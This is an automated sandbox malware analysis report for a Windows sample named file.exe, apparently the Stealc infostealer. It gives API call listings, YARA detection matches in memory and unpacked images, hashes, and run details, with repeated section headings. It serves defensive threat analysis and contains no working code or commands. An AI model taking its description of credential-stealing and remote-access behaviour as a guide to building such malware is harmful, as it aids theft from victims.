Code function: 0_2_00546920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00546920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00547850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00547A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00547A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1531682
Product:	CloudBasic
Start time:	15:59:10
Start date:	11.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1ad0ccf6d6aa03ebe1f0d87e2b21e748
SHA1:	a48f39c5b5a61d2aabf0d98844041e6b8ee3861e
SHA256:	3b22774fae4edcd3086ddfda63b8d6a7b469081f69845521570dc42f70a05e4d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by